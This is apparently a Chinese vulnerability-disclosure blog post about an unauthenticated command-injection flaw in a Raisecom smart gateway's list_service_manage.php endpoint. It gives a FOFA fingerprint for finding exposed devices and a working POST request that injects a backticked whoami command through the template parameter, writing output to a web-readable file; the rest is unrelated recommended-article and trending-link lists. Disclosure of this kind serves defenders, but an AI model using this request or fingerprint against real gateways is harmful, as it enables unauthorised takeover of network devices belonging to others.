某智能网关 list_service_manage存在命令执行漏洞

外道・輪廻天生2024-09-12 1:06

漏洞描述

瑞斯康达多业务智能网关list_service_manage.php存在未授权命令注入漏洞,攻击者利用可获取服务器权限。

资产信息

FOFA:

复制代码 
body="/images/raisecom/back.gif"

漏洞复现

poc

复制代码 
POST /vpn/list_service_manage.php?template=%60whoami%3E%2Fwww%2Ftmp%2F1.txt%60 HTTP/1.1
Host: 
Content-Type: application/x-www-form-urlencoded


Nradius_submit=true

访问文件url+/tmp/1.txt获取命令回显

相关推荐
霖霖总总5 分钟前
[小技巧19]MySQL 权限管理全指南:用户、角色、授权与安全实践
数据库·mysql·安全
晓幂6 小时前
【2025】HECTF
笔记·学习·web安全
上海云盾-高防顾问6 小时前
中小企业低成本渗透测试实操指南
网络协议·web安全·网络安全
tianyuanwo7 小时前
合并XFS分区:将独立分区安全融入LVM的完整指南
安全·lvm
智驱力人工智能7 小时前
守护流动的规则 基于视觉分析的穿越导流线区检测技术工程实践 交通路口导流区穿越实时预警技术 智慧交通部署指南
人工智能·opencv·安全·目标检测·计算机视觉·cnn·边缘计算
2501_945837439 小时前
云服务器的防护体系构建之道
网络·安全
小红卒14 小时前
海康威视未授权访问漏洞 (CVE-2017-7921)复现研究
安全
Data-Miner16 小时前
精品可编辑PPT | 大模型与智能体安全风险治理与防护
安全
Bug.ink17 小时前
BUUCTF——WEB(7)
web安全·网络安全·buuctf
咕噜企业分发小米17 小时前
直播云服务器安全防护有哪些最新的技术趋势?
运维·服务器·安全
热门推荐
01GitHub 镜像站点02Labelme从安装到标注:零基础完整指南03安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)04Linux下V2Ray安装配置指南05jdk21下载、安装(Windows、Linux、macOS)062025-04-03 Latex学习1——本地配置Latex + VScode环境07【踩坑笔记】50系显卡适配的 PyTorch 安装08Opencode CLI 安装成功,但是启动失败09UV安装并设置国内源10全球最强模型Grok4,国内已可免费使用!(附教程)